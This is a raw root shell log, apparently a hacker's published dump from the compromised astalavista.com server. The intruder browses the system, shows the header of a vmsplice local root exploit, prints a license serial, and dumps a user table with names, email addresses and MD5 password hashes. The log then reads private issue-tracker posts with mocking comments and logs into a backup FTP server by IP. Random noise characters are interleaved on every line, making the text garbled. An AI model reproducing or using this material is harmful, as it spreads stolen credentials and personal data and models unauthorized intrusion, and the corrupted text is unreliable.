sh-3.2# cd ../ D9 i1 A' X+ B+ A
sh-3.2# cd com
2 X4 z& U/ A" k4 L: d9 Osh-3.2# ls -la$ k6 m% k4 {& y2 [ U
total 141208& }" x( f; f: @. m5 U6 C# o2 x
drwx–x–x 10 com com 4096 Apr 28 12:40 .! R- `- P3 P- I* w5 i+ Z1 U; J
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..# z# i8 Z% D0 V/ r- r* Z
drwx—— 2 com com 4096 Jun 4 04:04 backups
1 N3 |& [3 E5 J4 D( E-rw-r–r– 1 root root 2419504 Sep 28 2007 backup.sql# Z L) b% g# T6 Q& N/ V: {
drwxr-xr-x 2 com com 4096 May 12 15:20 backup_system
. ]3 M* N7 w' w-rw——- 1 com com 21880 Jun 2 08:07 .bash_history# G3 p1 J1 e0 g2 x7 e; ~; ~
-rw-r–r– 1 com com 24 Sep 24 2007 .bash_logout/ N+ G( X0 o. `- k
-rw-r–r– 1 com com 176 Sep 24 2007 .bash_profile
w8 L& S* p$ ^& P8 f- i m X! A s-rw-r–r– 1 com com 124 Sep 24 2007 .bashrc$ L5 M4 C3 [2 ~: z- H
drwx–x–x 3 com com 4096 Jan 29 2008 domains
- |7 G4 o6 q/ B7 w. O-rw-r–r– 1 com com 16409 Jul 16 2008 FWUser.class.php.fixed
+ t5 d- }9 D$ @* T- s7 i, idrwxrwx— 3 com mail 4096 Jan 6 19:24 imap( ^* j3 a. w! f% V( h. _
-rw——- 1 com com 69 Nov 18 2008 .lesshst
( b$ ?5 d& X4 o+ Vdrwx—— 2 com com 4096 Sep 24 2007 mail
! r, [$ `! B' `-rw——- 1 com com 13970 Mar 28 21:42 .mysql_history5 v T, i' A9 {- g8 ? D) F
drwxr-xr-x 2 com com 4096 Aug 20 2008 .ncftp
4 \( G5 h8 e6 e8 `) \& Rlrwxrwxrwx 1 com com 37 Sep 24 2007 public_html -> ./domains/astalavista.com/public_html
4 o% n5 c9 I, a- a1 ?0 h& B8 g-rw-r—– 1 com mail 34 Sep 24 2007 .shadow7 s% o g9 ?) d( J9 A7 F, w8 Y: s
drwx—— 2 com com 4096 Aug 26 2008 .ssh
! ^4 |% u% ?& D, u j-rwx—— 1 com com 8515 Feb 10 2008 t
5 t4 X, V+ k) j-rw-rw-r– 1 com com 6265 Feb 11 2008 t.c
I% l6 {/ W" H' `( a$ J* a$ wdrwxrwxr-x 2 com com 4096 Jan 30 15:47 tmp0 @( g& `; |. U- g' N- C a0 R
-rw-rw-r– 1 com com 617 May 20 2008 .toprc9 l. M$ R4 ~. \; ?' ~6 x
-rw-rw-r– 1 com com 141851766 May 19 2008 version2-backup-20080519-0900.sql
9 g6 v; {1 v2 U# A* P% k-rw——- 1 com com 16629 Mar 28 21:46 .viminfo
# J3 L/ J0 y, R& z9 x. B-rw-rw-r– 1 com com 51 Aug 25 2008 .vimrc
, e9 o" A( w# T
* n1 ~9 Q' {% h, h3 D5 D+ vsh-3.2# head t.c \( P. Q( O$ L' e# [
/*/ b& \' d7 z: `7 e) q' K9 m3 ]2 C/ z/ L
* jessica_biel_naked_in_my_bed.c+ Q4 p2 F, k% ^
*
& ?$ h! n+ I& G1 T6 l8 f1 E* Dovalim z knajpy a cumim ze Wojta zas nema co robit, kura.
* w9 U, l6 z/ ]' F6 p) u* Gizdi, tutaj mate cosyk na hrani, kym aj totok vykeca.
2 b; q* \! G4 F* Stejnak je to stare jak cyp a aj jakesyk rozbite.
! d! X1 M+ |$ L0 [$ Z5 p) y*
' x# Q# Y6 i% J# a4 B2 Y8 l4 w* Linux vmsplice Local Root Exploit
. `; ~" j" @9 a" J& N) X2 G; \. c* By qaaz
! Y% R+ S% [) h# K$ _) S% `9 e*1 v0 \! g( u- E1 K
/ Z( U$ I' ?9 o9 \; z+ Rsh-3.2# cd /
# C1 }4 s% I9 x+ psh-3.2# ls -la. h# ^/ d! }3 l" W1 ]- F; J1 |
total 360
; B3 d$ ~: N, i/ X6 Q' t: hdrwxr-xr-x 25 root root 4096 Jun 3 02:43 .
2 w8 m* e- t% c8 v* ydrwxr-xr-x 25 root root 4096 Jun 3 02:43 ..
: F1 V7 z; w- F" H8 w: Y-rw——- 1 root root 10240 Jun 3 02:39 aquota.group6 m" P/ ]. M# U4 k+ ^) w, s
-rw——- 1 root root 10240 Jun 3 02:39 aquota.user9 p% Y; b7 W7 x% g/ ]! c
-rw-r—– 1 root root 819 Jul 17 2008 astalavista.us.db1 l$ x6 ~; X$ i& b1 T- R S
-rw-r–r– 1 root root 0 Jun 3 02:43 .autofsck
: Y" G' I+ I" E9 s-rw-r–r– 1 root root 0 Sep 16 2007 .autorelabel. J- M1 ^. a3 c) ~. a+ `# b4 G
drwxr-xr-x 3 root root 4096 Dec 29 2007 backup
0 b% k, x% r6 g0 J4 B! K, {2 Ndrwxr-xr-x 2 root root 4096 Jun 4 04:03 bin
& X3 W6 n) s/ Z/ o6 Q; Xdrwxr-xr-x 5 root root 4096 Jun 2 14:06 boot7 E2 }/ u P- k* g: v
drwxr-xr-x 11 root root 3620 Jun 3 02:43 dev
4 J9 J0 Y/ y/ n1 T' h7 N- vdrwxr-xr-x 84 root root 12288 Jun 4 03:16 etc& k7 m! G2 u4 P
drwxr-xr-x 14 root root 4096 Mar 11 17:56 home
8 }! ]. c$ e Q, A6 a; D8 j-rw-r–r– 1 root root 13387 Mar 20 2008 httpd.conf% J, h4 C" p" l- m4 L, h* v. V
drwxr-xr-x 11 root root 4096 Jun 4 04:02 lib' E# Q$ K" V( Q m& `
drwxr-xr-x 7 root root 4096 Jun 4 04:03 lib64/ ?% G; O* W8 O6 @+ q
drwx—— 2 root root 16384 Sep 11 2007 lost+found
" W; N9 H: R( ~! `. Cdrwxr-xr-x 2 root root 4096 Mar 11 17:56 media
7 }9 T1 p+ f5 ^* j- s2 sdrwxr-xr-x 2 root root 0 Jun 3 02:43 misc
5 d# F" D& l, _/ ydrwxr-xr-x 2 root root 4096 Mar 11 17:56 mnt9 L, a5 t$ [7 b3 P4 D6 F
-rw-r–r– 1 root root 5859 Feb 3 2008 mrtg.cfg
5 w3 _, p" `5 pdrwxr-xr-x 2 root root 0 Jun 3 02:43 net) z) G- I& [( p0 i7 e
drwxr-xr-x 3 root root 4096 Mar 11 17:56 opt% w- V' s* A; q6 A" p; |$ X* r5 J
dr-xr-xr-x 264 root root 0 Jun 3 02:42 proc4 S2 D ~/ u* w `
drwxr-x— 15 root root 4096 Jun 4 08:40 root9 x8 X) h: T, ]2 P4 i: l
drwxr-xr-x 2 root root 12288 Jun 4 04:03 sbin
" e' P K; Y" a. Tdrwxr-xr-x 2 root root 4096 Mar 11 17:56 selinux
3 y5 ?1 d$ y8 P) J/ J+ U' F0 E- Q% M' ddrwxr-xr-x 2 root root 4096 Mar 11 17:56 srv: E' ~0 I. k% A- @# i. `
drwxr-xr-x 11 root root 0 Jun 3 02:42 sys% R* y- T, e# a$ J
drwxrwxrwt 4 root root 122880 Jun 4 10:35 tmp
! ]# D- @. [, j' odrwxr-xr-x 16 root root 4096 Jun 2 13:56 usr
/ t" D% k# L" N" C' [6 Mdrwxr-xr-x 26 root root 4096 Jun 4 03:16 var
& g6 {, E+ N1 x" q# ?( C% e7 J5 b2 s! t' H
sh-3.2# cd opt* J0 B c( e m# a8 z2 g0 ?+ U; A
sh-3.2# ls -la4 K; r1 g% u, F% C# s
total 20
$ l" r( O& J, Q2 q6 Z0 X& Rdrwxr-xr-x 3 root root 4096 Mar 11 17:56 .
* l( N! v9 ]% P$ { t' Adrwxr-xr-x 25 root root 4096 Jun 3 02:43 ..
* o9 |9 }$ V V- M( mdrwxr-xr-x 15 root root 4096 Mar 20 2008 lsws" T9 z+ E5 K' J% y1 A. u0 q
4 F e* Y! p- ]5 `. E, q
sh-3.2# cd lsws/2 x" b) p1 f& \: J+ L
sh-3.2# ls -la
3 D0 G) B( F4 K+ v" J0 ^total 108/ Q5 q( g! Q7 Q, D, S' M/ l1 E0 J
drwxr-xr-x 15 root root 4096 Mar 20 2008 .
% k; k& L7 ~& P5 gdrwxr-xr-x 3 root root 4096 Mar 11 17:56 ..0 K7 _; y- k' @
drwxr-xr-x 8 root root 4096 Mar 20 2008 add-ons
, O% g7 \8 C3 |0 ^/ x. ~drwxr-xr-x 13 root root 4096 May 29 15:10 admin
! b4 L# a2 a' U8 @ x U7 }drwxr-xr-x 5 apache apache 4096 May 29 15:10 autoupdate
! Y% V& u; X. a2 m: {drwxr-xr-x 2 root root 4096 May 29 15:10 bin; G$ K0 `4 P. g+ z' X
drwx—— 4 apache apache 4096 Jun 3 02:43 conf. k Y8 o$ o: d
drwxr-xr-x 7 apache apache 4096 Mar 20 2008 DEFAULT0 n4 i& O5 ^5 S8 H L
drwxr-xr-x 2 root root 4096 Sep 15 2008 docs+ k+ ]0 h6 F& i$ ?) Z
drwxr-xr-x 2 root root 4096 May 29 15:10 fcgi-bin
3 h" w9 y/ x' c& J& a9 g3 Edrwxr-xr-x 2 root root 4096 Sep 15 2008 lib: X8 c1 K/ j" s$ y1 _5 p
-rw-r–r– 1 root root 6959 May 29 15:10 LICENSE1 \3 ]' e6 w$ M; U# ?( D! ]* _! |
-rw-r–r– 1 root root 2214 May 29 15:10 LICENSE.OpenLDAP9 ]/ Q9 s4 j1 l, P- p5 c
-rw-r–r– 1 root root 6279 May 29 15:10 LICENSE.OpenSSL
j# E9 ?* l+ |+ y+ i-rw-r–r– 1 root root 3208 May 29 15:10 LICENSE.PHP% Q2 M+ R% s/ N# b4 B( C' z4 c
drwxr-xr-x 2 root root 20480 Jun 4 09:55 logs2 a2 \- T" c7 P+ o* ?$ u7 x! q3 B
drwxr-xr-x 2 root root 4096 Mar 20 2008 php& q+ Z2 J; P% E. A: M# y
drwx—— 2 apache apache 4096 Mar 20 2008 phpbuild* d; ~% g$ B) G6 g
drwxr-xr-x 3 root root 4096 Mar 20 2008 share
1 u, X% `" P$ o- N2 ^2 d/ t-rw-r–r– 1 root root 6 May 29 15:10 VERSION5 ~3 F) ~; _& s6 m: ~
" v4 @% F: Z( X: B* K
sh-3.2# cd conf
# c8 N2 o# j# _% b/ b) d) [4 `* e! f1 ~sh-3.2# ls -la4 d1 o3 X' e. J
total 48
; Y! E% \# P8 c( g9 s; C0 m) Jdrwx—— 4 apache apache 4096 Jun 3 02:43 .
# `4 {0 S2 b8 {/ d$ Qdrwxr-xr-x 15 root root 4096 Mar 20 2008 ..6 i/ b( z P$ L1 y }4 f6 j) v5 Y
drwx—— 2 apache apache 4096 Mar 20 2008 cert& m3 S1 M/ h* C6 E
-rw-r–r– 1 apache apache 6668 May 29 15:13 httpd_config.xml! R" O2 A$ i y4 f0 Z" X9 J' }! n
-rw——- 1 apache apache 6613 May 27 18:33 httpd_config.xml.bak, q* T/ S+ n7 ~& |# ]! v7 x3 T1 l
-rw-r–r– 1 root apache 0 Jun 3 14:11 .last6 U/ K9 U. r% T8 y" T
-rw——- 1 apache apache 256 May 29 15:10 license.key P( v) M- a q6 S
-rw——- 1 apache apache 256 Mar 21 2008 license.key.old
5 K/ T- l- v' q+ E-rw——- 1 apache apache 3320 Mar 20 2008 mime.properties5 m, @; [1 z) ]) k( R* |4 W
-rw——- 1 apache apache 20 May 29 15:10 serial.no
' E/ |; ^$ d& X7 j& c7 Jdrwx—— 2 apache apache 4096 Mar 20 2008 templates
" D8 h" x; N: S; t$ [' `. O% E
# [- G* w% m. o _ |4 \sh-3.2# cat serial.no
( x! m1 R. w a+ e) ]& I- f: D VIbDl-oVsO-CKqL-wVRa& k" r( h/ k/ C$ U* Q
d7 W4 Z% `6 b/ ~1 }) D" _sh-3.2# mysql
G! c# C9 R) Z, M) c9 XWelcome to the MySQL monitor. Commands end with ; or \g.$ l4 l+ P9 A- R( S
Your MySQL connection id is 286844' ~- Q, ]# g; d
Server version: 5.0.45-community-log MySQL Community Edition (GPL)4 m% Q& K' |% ~' m4 K+ Y; `# R
2 i# _8 [* n2 q5 e& y# ^: ~- q2 |9 B
Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.
5 v% F: a+ T, {$ s) N% X+ F) O3 q1 |9 }. o8 [$ {- S3 T% W0 z
mysql> show databases;8 W3 n1 h m6 {. r7 C9 M
+———————–+
: H- c- Z/ J) F; L; Y" c| Database |% N+ |! u2 c; }& m% U1 b
+———————–+. d9 D, g9 S+ U, c' f' T, [
| information_schema |8 X7 S# i9 O; p. z& o
| astanet_ads |
2 m% ^. R6 x% W/ X b| astanet_mailing_lists |
: I4 g1 h9 g3 \4 L9 V' M. ^| astanet_mediawiki |
: o' g6 i3 @! d3 }+ i| astanet_membersystem |
* ?" ~$ w9 C5 p& P) N$ v/ Q' c5 H2 P| com_contrexx |, s' J) ]6 F4 j& X s; |
| com_contrexx2 |
4 _: @0 {* f; t* h% w4 N| com_contrexx2_live |2 l' z( _) g0 i- ?* X$ X4 w% S
| da_roundcube |
, j" J+ x; [. l# v: R! S2 t5 B| dolphin |
& v4 S: h. n+ N4 d( D) H$ F$ B| ideapool |# A$ C, x) |2 N6 C& u' J# h8 T0 W
| mysql |
9 ^6 l9 N' {8 o. |( q" @' c/ x$ A| test |6 y- s; ? i0 ~; y* S. m4 Z& G6 t
| yourmaster |
: P; M3 R# V! M4 f9 p. @" F j+———————–+( t8 x4 ]! V7 w: M2 X1 G
14 rows in set (0.00 sec)
. X/ O" \6 s* \1 U8 R- W1 D& d1 |$ A; K' u
mysql> use ideapool
+ u5 [4 N1 j+ |: Y9 m0 `Database changed
. S- T5 _# Q |9 {mysql> show tables;
0 N) y5 `, f# Q& ^7 F3 R) h B- ]- u2 S+———————————–+
5 ?$ n1 d2 X" a, J: O7 _7 T2 M| Tables_in_ideapool |
8 z8 f8 T' a- e* ? e8 }+———————————–+* H0 A; v5 O/ @6 Y+ B6 N7 U
| eventum_columns_to_display |
% S- s' X. v- _0 {| eventum_custom_field |2 i- L. Y2 t. w7 V+ W3 z
| eventum_custom_field_option |, C' t$ E9 [; e/ v0 q
| eventum_custom_filter |2 x9 ^% n" k4 |$ \$ m8 {) J% i+ c
| eventum_customer_account_manager |
# N9 m! E! v7 g, L| eventum_customer_note |
9 |2 |% M$ H. I3 n; _* {& [5 t- B| eventum_email_account |/ o8 h$ @3 ~- F4 y$ f5 F
| eventum_email_draft |& @' F$ l* v' k( J5 F0 w
| eventum_email_draft_recipient |, J- P p# X7 c% w( Y' z0 D/ F0 i
| eventum_email_response |
9 t1 E. e/ @$ n1 q0 q| eventum_faq |" |) ?" r$ _5 Z/ F3 `
| eventum_faq_support_level |2 \) L5 p: O, _9 ~
| eventum_group |: v9 H1 {+ ]1 ?) M: G
| eventum_history_type |
) L) B" g' d8 N5 ? a3 `, {9 y| eventum_irc_notice |8 F {0 ?5 m5 j9 W
| eventum_issue |2 d( J& D1 A3 W9 I' x3 J
| eventum_issue_association |+ ?5 N3 M9 ?) o: \
| eventum_issue_attachment |5 V) Z! M0 \6 L4 b2 G
| eventum_issue_attachment_file |6 P% \, `7 u7 C1 G9 j" m
| eventum_issue_checkin |5 e) t1 C* P7 g8 f' d+ K" n
| eventum_issue_custom_field |
' T8 w9 X. |% d| eventum_issue_history |* S* F- E7 [9 d7 ?
| eventum_issue_quarantine |
3 k( ^; R m, n9 W7 J) Y9 I; i| eventum_issue_requirement |
) s ^& F' t$ H% Y; G2 o. {| eventum_issue_user |) W$ W% ]* _3 _, p% O3 [
| eventum_issue_user_replier |
& g: @7 S$ T) u, q; e0 u| eventum_link_filter |
1 i, Z: ]8 r) W* m' Z| eventum_mail_queue |
2 i( K, V6 B+ r' t0 k| eventum_mail_queue_log |
6 _" X" q$ j6 J7 j9 J& ?' v| eventum_news |4 t$ I4 C4 d9 ~4 A: l
| eventum_note |; W8 F% f7 t! C8 i" D
| eventum_phone_support |8 W& P& r8 z, g2 `
| eventum_project |
8 O. A5 |6 o9 f" E8 |( |+ l- ^| eventum_project_category |, ^& z/ T# a; g+ r1 ?! O+ }3 L
| eventum_project_custom_field |
& Q* v7 c# B6 ?! W9 T| eventum_project_email_response |
$ g4 }+ T/ s. k| eventum_project_field_display |
7 d {! \) s" W6 [9 @$ v, ^| eventum_project_group |4 C5 \9 J0 v ~/ I- M; N; Z- r6 Q
| eventum_project_link_filter |4 A3 ? F0 W) ]
| eventum_project_news |
/ f e; V4 ^( M& i' O| eventum_project_phone_category |
- r% v- e& M. e/ G| eventum_project_priority |) S" w; s9 D: Z
| eventum_project_release |
$ i7 W) C( I9 z| eventum_project_round_robin |
6 Z9 k% i6 \) w+ e" ?4 s| eventum_project_status |
) W. Y3 h& |1 K) V7 y/ S' D| eventum_project_status_date |
4 i$ K" e& w; M5 g$ j| eventum_project_user |
$ ?* `! ~9 f6 b, F9 `. j( }| eventum_reminder_action |
' H( d# g8 m0 q; `; {| eventum_reminder_action_list |4 O! n' e: M( `4 w+ I9 y1 c
| eventum_reminder_action_type |1 r( U: `# w0 b7 _0 u; P
| eventum_reminder_field |
0 u+ e$ N: C0 d) L$ A N4 c- K8 g% ~| eventum_reminder_history |
& \2 k# i5 z5 Y3 P' X7 s0 w4 G| eventum_reminder_level |
1 @8 r5 Z/ X8 p| eventum_reminder_level_condition |5 H1 ~* m% q$ D& t
| eventum_reminder_operator |7 |) R; ~' ^! {# I* l: E2 w; _
| eventum_reminder_priority |
1 g( ]" g# |; }4 S$ M9 V6 d| eventum_reminder_requirement |' m5 G6 [* g6 V6 O
| eventum_reminder_triggered_action |
6 B6 b) E% v+ t5 t| eventum_resolution |" U# y* a; V: {* u" M
| eventum_round_robin_user |' H5 ?, L7 \- i) V9 W% w# }% U. h
| eventum_search_profile |
# p7 A# L5 Y2 x) T| eventum_status |# p8 n( ~: P$ C$ o) Q! l
| eventum_subscription |
- b# T* t& w, |* H| eventum_subscription_type |& [/ v- ^3 G. I+ w
| eventum_support_email |
7 A* O3 ]- `3 s) m% v" X2 V| eventum_support_email_body |
8 f _! n% J2 Q. m+ }7 D0 {| eventum_time_tracking |
( C$ O" v4 A8 a) i) G1 V| eventum_time_tracking_category |' D/ J/ ^' e5 T- g5 f- t$ v
| eventum_user |
/ b0 q4 |: L) k8 D& t+———————————–+6 o3 \ @4 K1 ~. l
69 rows in set (0.00 sec): v8 A) {' N3 w2 ]. f
2 h' Z9 r* r/ t/ R/ [5 w( n
mysql> describe eventum_user;
/ n5 c+ Y( v# Z2 ~' ~* l+————————-+——————+——+—–+———————+—————-+, N( F! u6 i, V' z
| Field | Type | Null | Key | Default | Extra |
% Y7 k& j0 k) |8 B. y: ?+————————-+——————+——+—–+———————+—————-+. U- T& |; k8 O8 L) \3 b
| usr_id | int(11) unsigned | NO | PRI | NULL | auto_increment |
6 {# |. i/ q# W& H| usr_grp_id | int(11) unsigned | YES | MUL | NULL | |
& g% R B V, W9 d( c| usr_customer_id | int(11) unsigned | YES | | NULL | |
9 W4 \1 _; O) ?; T" V# x| usr_customer_contact_id | int(11) unsigned | YES | | NULL | |* X! p p9 P; B3 a- A
| usr_created_date | datetime | NO | | 0000-00-00 00:00:00 | |
& [9 n$ k$ L" i| usr_status | varchar(8) | NO | | active | |
' p) T* i" w5 G1 P, h| usr_password | varchar(32) | NO | | | |
. d2 U! x2 o. @$ }' U| usr_full_name | varchar(255) | NO | | | |
& V. ^' T6 w& r& _| usr_email | varchar(255) | NO | UNI | | |
+ [6 I5 o k3 u$ [| usr_preferences | longtext | YES | | NULL | |( h5 E. ~- E5 E+ z" l9 Y8 X% j
| usr_sms_email | varchar(255) | YES | | NULL | |; U. P5 t& F% k3 s
| usr_clocked_in | tinyint(1) | YES | | 0 | |. N. F5 O& ?$ Q
| usr_lang | varchar(5) | YES | | NULL | |
- h( l9 e. i* x8 x9 _% l% i" x+————————-+——————+——+—–+———————+—————-+% X& q2 n# I$ Z* F+ d7 ~
13 rows in set (0.00 sec)
+ L3 d+ R8 B$ Q: D- b# l
: b; E2 H' F1 i P% B& ymysql> select usr_full_name,usr_email,usr_password from eventum_user;
2 Y" T3 x3 C* q: h' r; w# b5 T+———————-+——————————-+———————————-+
& f1 Y& l5 s' f3 G| usr_full_name | usr_email | usr_password |1 y- e+ @5 d5 y Y& T
+———————-+——————————-+———————————-+
2 {2 T8 v3 U O1 o9 `1 V| system | 链接标记system-account@example.com | 14589714398751513457adf349173434 |
9 x# g& W, s( f/ M| Developer (Paulo) | 链接标记paulo.santos@astalavista.ch | 26a35a1cf8895c27fb37ef4cf149f7bb |
8 [, |; O- h- L| Be1er0ph0r | 链接标记be1er0ph0r@gmx.de | 229766dc0ca1fb67160a8782321dfdce |
2 _% _0 k' F7 y; f8 u/ l* J* i8 V5 {| Admin | 链接标记pascal.mittner@astalavista.ch | 57c2877c1d84c4b49f3289657deca65c |
( T u2 X/ q# o* ^* j4 y# R; ~| ADMIN | 链接标记admin@astalavista.ch | f6fdffe48c908deb0f4c3bd36c032e72 |
. d A% h" u8 a3 f( E; M! S| USER | 链接标记user@astalavista.ch | 5cc32e366c87c4cb49e4309b75f57d64 |- y! Z) W, K: F: m# W
| Glafkos - (nowayout) | 链接标记glafkos@astalavista.com | f7735ab119023a8abb2301e67f81cd67 |
7 K( e# g. W, n" u- f. [$ L| Joao | 链接标记joao.pontes@astalavista.net | f805c071d7c823b937448c54c047b9fd |& `, c Z$ ]% ~7 d0 C9 ^
| Pascal | 链接标记pm@astalavista.ch | e10adc3949ba59abbe56e057f20f883e |
/ ]( E5 f8 w) w' W O* W7 W| commander | 链接标记commander@astalavista.com | 932cd250918f881d41feb0b93883a926 |
$ A+ A1 J/ ^. e, ~+ |4 l. v| ishtus | 链接标记ishtus@astalavista.com | a587ffc88b3dbbba3fd2fe67af649ff0 |
0 M1 b$ K% t+ W, ]) H7 e) j| sykadul | 链接标记sykadul@astalavista.com | 20224a2f3eeb57a13a10b4df543c128e |
, i( {, _8 u9 L0 Y5 `| Zach McElroy | 链接标记admin@badfoo.net | 33c5d4954da881814420f3ba39772644 |
) \8 c) ]9 B: `, H, f5 D" \1 k* ]| usb | 链接标记usbenigma@hushmail.com | b513f22c3db6932855ad732f5f8a10a2 |
0 t& x; I7 J" o0 d( n% ]| cyph3r | 链接标记cyph3r@astalavista.com | 6e1e50017a945e874d52ec91f9ab2cee |
( n* _! _: c& M" B* u# k$ b5 T1 w P+———————-+——————————-+———————————-+% X. W7 h' R: m- m, a/ e
15 rows in set (0.00 sec)5 `8 Z, i" D2 o: E
* |: U' }- n/ }, Kmysql> select iss_description from eventum_issue where iss_id = 43;
8 r$ b P3 X! S! S+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+
! i% P2 m$ n i/ y| iss_description
4 u {' s- b- E* R* N: H8 z|
0 W$ L; ` @8 g b2 l1 S+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+* s% H2 b6 ~, O) z" u( V
| Ok guys, to boost our traffic and revenue what we have to do is keep users logged in… how to do that? well think about it… if a user is watching a movie… he’ll be
3 P2 `$ ^' m- `, O3 nconnected for 90 mins… 120mins… so what i propose is something like:
2 X9 C( P$ N8 p" j- M$ S4 k链接标记[url]http://www.surfthechannel.com/[/url]& U- p' L, C$ K! K1 L% m2 @# H
since they only provide LINKS to the movies they are LEGAL and don’t break DMCA rules… so we could do the same… “iframe” the content on our website or use a system
6 j! O: L, ]. S9 qlike podcast that uses our own flash player to stream content from other places, therefore the content NOT BEING HOSTED ON OUR SERVERS but only viewed… which doesn’t- \- r; f' o1 e& n
break any laws as far as i am aware (we should research on that just to be sure though!) Of course we would have to provide users with the button to take the content off
; M! R0 r* W4 _# z) ^if they think it breaks copyright laws and we will remove it… i think that makes it on the border of DMCA…: R/ j# _6 O+ K) S' l& H
! X+ P F) G0 g4 CWe could also put advertisement during play on the flash video player itself… extra $$…/ P `! s* q7 C2 l' }9 W, g! s
$ V" U g' Y' P' Z2 j* mBy sykadul |
( O7 G: }* G& @+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+8 s% V8 P% h: O0 c' m
1 row in set (0.00 sec)
- u; b! w, I7 L$ k' R
, y+ n( ]# F$ x; _' h* J+ c! J3 H) X// Money and extra $$ is all they care about. remember that.- t! A8 b, a0 u# |
3 J$ ?1 n+ }6 W8 q
mysql> select iss_summary,iss_description from eventum_issue where iss_id =42;
" K" F1 D$ r2 a& g [1 q' R% G) B+————————+——————————————————————————————————————————————————————————————————————————————-+
8 R$ w7 I5 d4 j; \, _$ ]| iss_summary | iss_description * `" W) h. p7 }
|4 p9 m' I8 z/ O' A# f% y* V* _
+————————+——————————————————————————————————————————————————————————————————————————————-+* v1 C( w- l* C/ q) D5 O; T9 ]* Y
| Forum for REAL EXPERTS | Hello,
) H1 Z: J# M0 q G/ m7 b0 P$ f" ?: k
Ishtus and I,. q/ l, E p3 \& J6 G
% \! @0 K, r8 ^. L+ p, @
Came up with a crazy and very workable and professional idea. We create an invitation only forum with the BEST security experts worldwide
) t7 \) ~9 t* h# U2 X0 Z& uONLY. Security Experts from Bugtraq lists, exploit writters, reverse engineers etc..9 P: ~: _' L" l) w: `
& d( Z3 ^0 o' z: ]
One example a friend of mine from coresecurity.com!; M' B* L* c O' S0 T; n
$ W3 F9 ^( L: o+ r8 D$ p `We could have big projects etc.. and we can work all together to bring to the security community exploits, open source software etc..# @ `$ K6 f3 |: y! n- Y
6 r8 A0 X3 [1 r. ?2 W, K5 v+ ~ Y
|
/ _8 g9 Q, O0 D' y0 y+————————+——————————————————————————————————————————————————————————————————————————————+
, c6 B& ]. z$ `, S4 I1 row in set (0.00 sec)
. V3 C4 N$ |5 _; I3 W7 }
% l* v* `2 @% z$ y* j J( W// What an awesome yet original idea Ishtus and him… bring MORE security “experts”, thats exactly what the world needs…
6 d. a/ a1 u! D4 {' B- d
. ?, Z: S( C5 r2 `. B1 bmysql> select iss_summary,iss_description from eventum_issue where iss_id = 16;& F: c1 ?8 |. g: J. f
+——————+———————————————————————————————+
8 F/ w4 j4 \' _- y) t1 `" }| iss_summary | iss_description |
, T5 i/ V( i+ I4 _9 V4 [! w% @" D; P+——————+———————————————————————————————+" `- M4 b6 n5 P
| Website guidance | Virtual Girl which guides you trought the website.
8 W# ^; x! q$ M% e
/ d/ L, H3 p9 U! fWe need a girl with who you can ( talk )!!!3 {: L3 J) s% U. U% m5 s" X
Also for the News!% H0 x" _/ a. K* p
So my suggestion is a girl who read you the news loud if you like!
7 e7 V. v' u, x# ryou can choose between read yourselfe or she read it for you or both!
) t6 @; e2 ?, f! P) H8 X) `, x" o' z' s% p# L, O, x
Go to 链接标记[url]www.heise.de[/url]! There is an example for Voice News! It’s a good thing!!!; B( Q$ @( F2 \) c6 S7 P
* u5 D4 y9 `. J5 A0 f" I* _5 c
Have a look on the example girls!!4 u& ?; S0 e8 V# m6 R, o# i
6 u6 m, g0 X3 O: V链接标记[url]http://www.yaoti.com/de/free_yaoti.html[/url]1 `# E) ?5 k8 m1 q% c7 j# q
- y4 g' _# U- f- e: J
or that# K; q, X+ d, E+ Y7 o& m1 ]2 o
i* M i6 C! o1 e
链接标记[url]http://www.yellostrom.de/[/url], t6 B8 T( V- y8 q# ]& c
* H) X+ \0 j5 W$ s s
|! m& H' Q$ X6 l2 \& K; U
+——————+———————————————————————————————+' Q$ m1 S9 S- W; \
1 row in set (0.00 sec)& V7 h' {5 | M
; O# X* y0 [- C) h
// ha ha.
3 F* e D0 t/ e8 o* O. Q- V9 ~ c) z9 e8 n
mysql> select iss_summary,iss_description from eventum_issue where iss_id = 7;
! P4 z7 A! [% p) D+————————–+———————————————————————————————————–+
5 w* B1 }6 a3 T| iss_summary | iss_description |' E- d+ }* T7 m$ x4 [
+————————–+———————————————————————————————————–+( X" F: m9 }) K; [9 u0 @3 {
| Exploit Development Team | We need an exploit development team to focus on exploit research and publication under Astalavista name. |& V* } Z- c( z; C4 x# n% Q
+————————–+———————————————————————————————————–+
+ Y" O. R! N. s9 O; W9 K1 row in set (0.00 sec)
; } o8 ?. X {4 s+ ]4 R3 a! v9 o. s# w5 w' P- N
// LOL.0 R8 T5 o$ D+ A- \. S2 j7 I* t) r8 |
% z% @" a0 m7 Z6 c0 V! b: l
mysql> exit
2 Y% Q; a( f: j9 O3 [, YBye
! ?6 M7 O: ~' j. z6 @5 A# v* k' u8 n' T/ L& o" Z. o2 m
sh-3.2# ftp 212.254.194.163
; A: @/ z* X5 \# FConnected to 212.254.194.163.
4 J# o' ?+ ~' [; G2 e- D220 BackupCOM_VW FTP server ready.+ M: ^/ j: P6 G$ Z! ~0 e$ ^2 I
504 AUTH: security mechanism ‘GSSAPI’ not supported.
9 z& @* j' d! k0 h, T. k504 AUTH: security mechanism ‘KERBEROS_V4′ not supported.
" e9 B" r! I$ |0 `( |KERBEROS_V4 rejected as an authentication type" `! A3 n1 ~4 P! w3 j7 h
Name (212.254.194.163:root): astalavista.com
3 m! d C7 y$ k331 Password required for astalavista.com.
, `0 |. @4 z; m9 }8 c4 yPassword:1 f0 }- n& d% }0 H q( J
230 User astalavista.com logged in.
0 V. H1 M& x) G, t4 F: oRemote system type is UNIX.8 [! L9 y5 Y3 H9 f* F. g: O
Using binary mode to transfer files.- e" O* T7 s- r% {
ftp> ls -la
" S5 A0 u4 m8 Q7 V" G% `) d227 Entering Passive Mode (212,254,194,163,2,188)
* s' v) K0 y4 f: ~150 Opening BINARY mode data connection for ‘file list’.
) K* e) k& S+ ?$ Fdr-x—— 1 root users 4096 Jun 4 06:13 astalavista.com5 t! b$ F f! h) u6 K
226 Transfer complete.4 T2 v0 ?7 `3 S# l9 r- u0 H
ftp> cd astalavista.com
